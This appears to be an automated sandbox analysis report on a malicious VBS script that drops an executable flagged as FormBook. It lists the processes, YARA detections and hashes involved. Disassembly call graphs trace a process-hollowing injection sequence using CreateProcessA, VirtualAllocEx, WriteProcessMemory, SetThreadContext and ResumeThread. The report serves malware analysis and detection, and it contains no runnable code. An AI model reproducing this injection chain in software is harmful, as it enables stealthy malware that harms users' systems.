                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:05:18:25
                                            Start date:12/11/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs"
                                            Imagebase:0xffda0000
                                            File size:168'960 bytes
                                            MD5 hash:045451FA238A75305CC26AC982472367
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:05:18:36
                                            Start date:12/11/2024
                                            Path:C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"
                                            Imagebase:0xac0000
                                            File size:833'536 bytes
                                            MD5 hash:E4CD22AA149644D6606290EBF0375D67
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:05:18:36
                                            Start date:12/11/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            Imagebase:0x910000
                                            File size:64'704 bytes
                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.495043651.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.495043651.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.495204782.0000000005700000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.495204782.0000000005700000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:05:19:21
                                            Start date:12/11/2024
                                            Path:C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe"
                                            Imagebase:0x1040000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.639336446.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.639336446.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:5
                                            Start time:05:19:23
                                            Start date:12/11/2024
                                            Path:C:\Windows\SysWOW64\gpupdate.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\gpupdate.exe"
                                            Imagebase:0xf90000
                                            File size:16'896 bytes
                                            MD5 hash:37A4FA8BFAC3778EE35C1362FB1A6175
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.639241553.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.639241553.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.639223154.0000000000450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.639223154.0000000000450000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.639051770.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.639051770.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:6
                                            Start time:05:19:35
                                            Start date:12/11/2024
                                            Path:C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe"
                                            Imagebase:0x1040000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:10
                                            Start time:05:19:51
                                            Start date:12/11/2024
                                            Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                            Imagebase:0xd10000
                                            File size:517'064 bytes
                                            MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.554604259.0000000000220000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.554604259.0000000000220000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:moderate
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:21%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:91
                                              Total number of Limit Nodes:0
                                              execution_graph 2519 4f0768 2520 4f076d CreateProcessA 2519->2520 2522 4f7918 2520->2522 2532 4f07d8 2534 4f07dd WriteProcessMemory 2532->2534 2535 4f8467 2534->2535 2536 4f07a8 2537 4f07ad ReadProcessMemory 2536->2537 2539 4f7e76 2537->2539 2507 4f7c01 2508 4f7c55 Wow64SetThreadContext 2507->2508 2510 4f7ccb 2508->2510 2527 4f6bc1 2529 4f6bd0 2527->2529 2528 4f6ccc 2529->2528 2530 4f7099 6 API calls 2529->2530 2531 4f7341 6 API calls 2529->2531 2530->2528 2531->2528 2416 4f6bd0 2418 4f6bf4 2416->2418 2417 4f6ccc 2418->2417 2421 4f7099 2418->2421 2435 4f7341 2418->2435 2422 4f70d5 2421->2422 2423 4f733c 2422->2423 2449 4f7498 2422->2449 2423->2417 2424 4f7150 2453 4f7d28 2424->2453 2457 4f7d19 2424->2457 2425 4f72fd 2469 4f8100 2425->2469 2427 4f7219 2461 4f7ee0 2427->2461 2465 4f7ed0 2427->2465 2437 4f713e 2435->2437 2436 4f733c 2436->2417 2437->2436 2445 4f7498 CreateProcessA 2437->2445 2438 4f7150 2447 4f7d19 ReadProcessMemory 2438->2447 2448 4f7d28 ReadProcessMemory 2438->2448 2439 4f72fd 2446 4f8100 WriteProcessMemory 2439->2446 2440 4f7315 2444 4f84d8 3 API calls 2440->2444 2441 4f7219 2442 4f7ed0 VirtualAllocEx 2441->2442 2443 4f7ee0 VirtualAllocEx 2441->2443 2442->2439 2443->2439 2444->2436 2445->2438 2446->2440 2447->2441 2448->2441 2450 4f74bc 2449->2450 2483 4f0774 2450->2483 2452 4f7552 2452->2424 2454 4f7d48 2453->2454 2487 4f07b4 2454->2487 2458 4f7d28 2457->2458 2459 4f07b4 ReadProcessMemory 2458->2459 2460 4f7d8a 2459->2460 2460->2427 2462 4f7f07 2461->2462 2491 4f07cc 2462->2491 2464 4f7f6b 2464->2425 2466 4f7f07 2465->2466 2467 4f07cc VirtualAllocEx 2466->2467 2468 4f7f6b 2467->2468 2468->2425 2470 4f8127 2469->2470 2495 4f07e4 2470->2495 2472 4f7315 2475 4f84d8 2472->2475 2473 4f07e4 WriteProcessMemory 2474 4f81cc 2473->2474 2474->2472 2474->2473 2476 4f84ff 2475->2476 2477 4f07e4 WriteProcessMemory 2476->2477 2478 4f8580 2477->2478 2482 4f8626 2478->2482 2499 4f07fc 2478->2499 2481 4f86a2 2481->2423 2503 4f0814 2482->2503 2484 4f75e0 CreateProcessA 2483->2484 2486 4f7918 2484->2486 2488 4f7db0 ReadProcessMemory 2487->2488 2490 4f7d8a 2488->2490 2490->2427 2492 4f7fe0 VirtualAllocEx 2491->2492 2494 4f809e 2492->2494 2494->2464 2497 4f8380 WriteProcessMemory 2495->2497 2498 4f8467 2497->2498 2498->2474 2500 4f7c08 Wow64SetThreadContext 2499->2500 2502 4f7ccb 2500->2502 2502->2482 2504 4f8700 ResumeThread 2503->2504 2506 4f878f 2504->2506 2506->2481 2511 4f7ac0 2512 4f7adc 2511->2512 2514 4f7b74 2512->2514 2515 4f078c 2512->2515 2516 4f7c08 Wow64SetThreadContext 2515->2516 2518 4f7ccb 2516->2518 2518->2514

                                              Executed Functions

                                              Function 004F0774 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 341processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4f0774-4f7683 3 4f76e5-4f7710 0->3 4 4f7685-4f76b5 0->4 7 4f7772-4f77cb 3->7 8 4f7712-4f7742 3->8 4->3 11 4f76b7-4f76bc 4->11 15 4f77cd-4f77fa 7->15 16 4f782a-4f7916 CreateProcessA 7->16 8->7 21 4f7744-4f7749 8->21 13 4f76df-4f76e2 11->13 14 4f76be-4f76c8 11->14 13->3 18 4f76cc-4f76db 14->18 19 4f76ca 14->19 15->16 30 4f77fc-4f7801 15->30 39 4f791f-4f79f9 16->39 40 4f7918-4f791e 16->40 18->18 22 4f76dd 18->22 19->18 24 4f776c-4f776f 21->24 25 4f774b-4f7755 21->25 22->13 24->7 27 4f7759-4f7768 25->27 28 4f7757 25->28 27->27 31 4f776a 27->31 28->27 33 4f7824-4f7827 30->33 34 4f7803-4f780d 30->34 31->24 33->16 35 4f780f 34->35 36 4f7811-4f7820 34->36 35->36 36->36 38 4f7822 36->38 38->33 51 4f79fb-4f79ff 39->51 52 4f7a09-4f7a0d 39->52 40->39 51->52 55 4f7a01 51->55 53 4f7a0f-4f7a13 52->53 54 4f7a1d-4f7a21 52->54 53->54 56 4f7a15 53->56 57 4f7a23-4f7a27 54->57 58 4f7a31-4f7a35 54->58 55->52 56->54 57->58 62 4f7a29 57->62 60 4f7a6b-4f7a76 58->60 61 4f7a37-4f7a60 58->61 66 4f7a77 60->66 61->60 62->58 66->66
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,00000000,02FA3578,02FA357C,004F7552,?,?,?,?), ref: 004F7903
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: dP0
                                              • API String ID: 963392458-754833174
                                              • Opcode ID: f334f43bf70a2d26ee2bb94997c6260620fd544fde54e568189a9f9d0f6075d4
                                              • Instruction ID: b0045727e7f320bf291e8e8e823723a1f789fa1479c15caa1e51bc093e26091a
                                              • Opcode Fuzzy Hash: f334f43bf70a2d26ee2bb94997c6260620fd544fde54e568189a9f9d0f6075d4
                                              • Instruction Fuzzy Hash: C3D12970D0421D8FEB15DFA4C881BEEBBF1BB49300F0091AAD559B7290DB789A85CF95
                                              Function 004F07E4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 67 4f07e4-4f83ef 70 4f8406-4f8465 WriteProcessMemory 67->70 71 4f83f1-4f8403 67->71 72 4f846e-4f84b8 70->72 73 4f8467-4f846d 70->73 71->70 73->72
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 004F8455
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: O0
                                              • API String ID: 3559483778-3037329402
                                              • Opcode ID: 18c550b832b2156011bedc2aa240d229d6d75c5d730ad4be0127e422602b9804
                                              • Instruction ID: 9041f547ba3647e84ebada63f9c1b4a6a020cb343c354ddd4671e501f8dcc728
                                              • Opcode Fuzzy Hash: 18c550b832b2156011bedc2aa240d229d6d75c5d730ad4be0127e422602b9804
                                              • Instruction Fuzzy Hash: AE417BB5D002589FCB00CFA9D984AAEFBF1BB49314F24902AE914BB210D774AA45CB54
                                              Function 004F07A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 77 4f07a8-4f7e74 ReadProcessMemory 81 4f7e7d-4f7ec7 77->81 82 4f7e76-4f7e7c 77->82 82->81
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,00000004,?,004F7D8A,?), ref: 004F7E64
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID: o0
                                              • API String ID: 1726664587-2238010683
                                              • Opcode ID: 3d7f7ddbb700727e0c551f4c0c95e2da356e0cd4dfdfe402b52636775525e8ce
                                              • Instruction ID: 929eebbe30ae01e515651fef5597e84be0e7df62accd9c6c23e983b0e20ba994
                                              • Opcode Fuzzy Hash: 3d7f7ddbb700727e0c551f4c0c95e2da356e0cd4dfdfe402b52636775525e8ce
                                              • Instruction Fuzzy Hash: 4341BDB5D042589FCB00CFA9D984AEEFBB1AF49310F10906AE814B7310D378AA45CF69
                                              Function 004F07FC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 86 4f07fc-4f7c6c 89 4f7c6e-4f7c80 86->89 90 4f7c83-4f7cc9 Wow64SetThreadContext 86->90 89->90 91 4f7ccb-4f7cd1 90->91 92 4f7cd2-4f7d16 90->92 91->92
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 004F7CB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: 0O0
                                              • API String ID: 983334009-2316460004
                                              • Opcode ID: 7a3e06bde9252b38ffaecfb7ebe3a03fac61e6d699b637ea21c5b05c33b3b4bb
                                              • Instruction ID: 07f875359750bd862783fe41f48c1bf108d6ebc69829665ab278459c49494f79
                                              • Opcode Fuzzy Hash: 7a3e06bde9252b38ffaecfb7ebe3a03fac61e6d699b637ea21c5b05c33b3b4bb
                                              • Instruction Fuzzy Hash: 6A41ABB4D052589FCB10CFA9D884AEEFBF1BB49314F20802AE414B7310D778AA45CF59
                                              Function 004F7C01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 96 4f7c01-4f7c6c 98 4f7c6e-4f7c80 96->98 99 4f7c83-4f7cc9 Wow64SetThreadContext 96->99 98->99 100 4f7ccb-4f7cd1 99->100 101 4f7cd2-4f7d16 99->101 100->101
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 004F7CB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: o0
                                              • API String ID: 983334009-2238010683
                                              • Opcode ID: f885f42d7a2fed5d4bbb40ba2c4341c2456fa4ec11de14412b16b44c9559f849
                                              • Instruction ID: 106bbc6a9d738207701bd15f28099b83951a32a7bb10f7c039925e7045d1f340
                                              • Opcode Fuzzy Hash: f885f42d7a2fed5d4bbb40ba2c4341c2456fa4ec11de14412b16b44c9559f849
                                              • Instruction Fuzzy Hash: CE419CB4D012589FDB10CFA9D984AEEFBF1BB49314F14902AE814B7310D778AA45CF55
                                              Function 004F0768 Relevance: 1.8, APIs: 1, Instructions: 345processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 105 4f0768-4f7683 109 4f76e5-4f7710 105->109 110 4f7685-4f76b5 105->110 113 4f7772-4f77cb 109->113 114 4f7712-4f7742 109->114 110->109 117 4f76b7-4f76bc 110->117 121 4f77cd-4f77fa 113->121 122 4f782a-4f7916 CreateProcessA 113->122 114->113 127 4f7744-4f7749 114->127 119 4f76df-4f76e2 117->119 120 4f76be-4f76c8 117->120 119->109 124 4f76cc-4f76db 120->124 125 4f76ca 120->125 121->122 136 4f77fc-4f7801 121->136 145 4f791f-4f79f9 122->145 146 4f7918-4f791e 122->146 124->124 128 4f76dd 124->128 125->124 130 4f776c-4f776f 127->130 131 4f774b-4f7755 127->131 128->119 130->113 133 4f7759-4f7768 131->133 134 4f7757 131->134 133->133 137 4f776a 133->137 134->133 139 4f7824-4f7827 136->139 140 4f7803-4f780d 136->140 137->130 139->122 141 4f780f 140->141 142 4f7811-4f7820 140->142 141->142 142->142 144 4f7822 142->144 144->139 157 4f79fb-4f79ff 145->157 158 4f7a09-4f7a0d 145->158 146->145 157->158 161 4f7a01 157->161 159 4f7a0f-4f7a13 158->159 160 4f7a1d-4f7a21 158->160 159->160 162 4f7a15 159->162 163 4f7a23-4f7a27 160->163 164 4f7a31-4f7a35 160->164 161->158 162->160 163->164 168 4f7a29 163->168 166 4f7a6b-4f7a76 164->166 167 4f7a37-4f7a60 164->167 172 4f7a77 166->172 167->166 168->164 172->172
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,00000000,02FA3578,02FA357C,004F7552,?,?,?,?), ref: 004F7903
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: f1073736292ef3a4e3abc669c32e728e14b29cf4f6ab974f225b446ed36ca79c
                                              • Instruction ID: be100cbca52f4c36dcd6802cb635e27aee1cfe60f859203e10de0cdd05187e0d
                                              • Opcode Fuzzy Hash: f1073736292ef3a4e3abc669c32e728e14b29cf4f6ab974f225b446ed36ca79c
                                              • Instruction Fuzzy Hash: E8D13970D0421D8FEB15DFA4C881BEEBBB1BF45300F0091AAD559B7290DB789A85CF95
                                              Function 004F07D8 Relevance: 1.6, APIs: 1, Instructions: 122injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 173 4f07d8-4f83ef 177 4f8406-4f8465 WriteProcessMemory 173->177 178 4f83f1-4f8403 173->178 179 4f846e-4f84b8 177->179 180 4f8467-4f846d 177->180 178->177 180->179
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 004F8455
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 2295dea428b8cb23ef4b2a09e741a91458272bf8d6fcbe6d8170a799d86be724
                                              • Instruction ID: 3e965009e12af23f7c89ac2d6f7256446f1c1235e237259c5e8862691e238dd6
                                              • Opcode Fuzzy Hash: 2295dea428b8cb23ef4b2a09e741a91458272bf8d6fcbe6d8170a799d86be724
                                              • Instruction Fuzzy Hash: 2A41ABB4D002589FCB00CFA9D884AEEFBF0BF49310F24906AE818BB210D774AA45CB55
                                              Function 004F8379 Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 184 4f8379-4f83ef 186 4f8406-4f8465 WriteProcessMemory 184->186 187 4f83f1-4f8403 184->187 188 4f846e-4f84b8 186->188 189 4f8467-4f846d 186->189 187->186 189->188
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 004F8455
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 973b343afbc2e1a6c62ca47c324da1f82faf2088120f4d8abda08dbd8eafcfca
                                              • Instruction ID: d678f98e25b0237b554fc204843810b2cc29cad88d26dab724e99261780fcf7a
                                              • Opcode Fuzzy Hash: 973b343afbc2e1a6c62ca47c324da1f82faf2088120f4d8abda08dbd8eafcfca
                                              • Instruction Fuzzy Hash: EF417BB4D002589FCB00CFA9D984AEEFBB1BF49314F24902AE814BB210D378A945CB54
                                              Function 004F07B4 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 193 4f07b4-4f7e74 ReadProcessMemory 196 4f7e7d-4f7ec7 193->196 197 4f7e76-4f7e7c 193->197 197->196
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,00000004,?,004F7D8A,?), ref: 004F7E64
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 9b2795319487afa662c69b0c50f5877ff305f4a6b5b8601cb3a1b212950cf19a
                                              • Instruction ID: e8559f484abc3fb05e532b641f9fb69daddd24876d57ca8d2f576d707947eb91
                                              • Opcode Fuzzy Hash: 9b2795319487afa662c69b0c50f5877ff305f4a6b5b8601cb3a1b212950cf19a
                                              • Instruction Fuzzy Hash: 99417CB5D042589FCB00CFA9D984AEEFBB1BB49310F10946AE914B7310D379AA45CF69
                                              Function 004F07CC Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 201 4f07cc-4f809c VirtualAllocEx 204 4f809e-4f80a4 201->204 205 4f80a5-4f80e7 201->205 204->205
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 004F808C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: f9590c49e5994f694f01971c2401740fe43a097fee83881e94b61f8a5e499611
                                              • Instruction ID: ffedcdaeda0660e23da3fde2c0d92f721306cffe7e3d160f1dcf1628ccd4cbd1
                                              • Opcode Fuzzy Hash: f9590c49e5994f694f01971c2401740fe43a097fee83881e94b61f8a5e499611
                                              • Instruction Fuzzy Hash: 254178B9D0425C9FCF10CFA9D984A9EFBB1BB49310F20901AE914BB310D775A945CB69
                                              Function 004F078C Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 209 4f078c-4f7c6c 212 4f7c6e-4f7c80 209->212 213 4f7c83-4f7cc9 Wow64SetThreadContext 209->213 212->213 214 4f7ccb-4f7cd1 213->214 215 4f7cd2-4f7d16 213->215 214->215
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 004F7CB9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
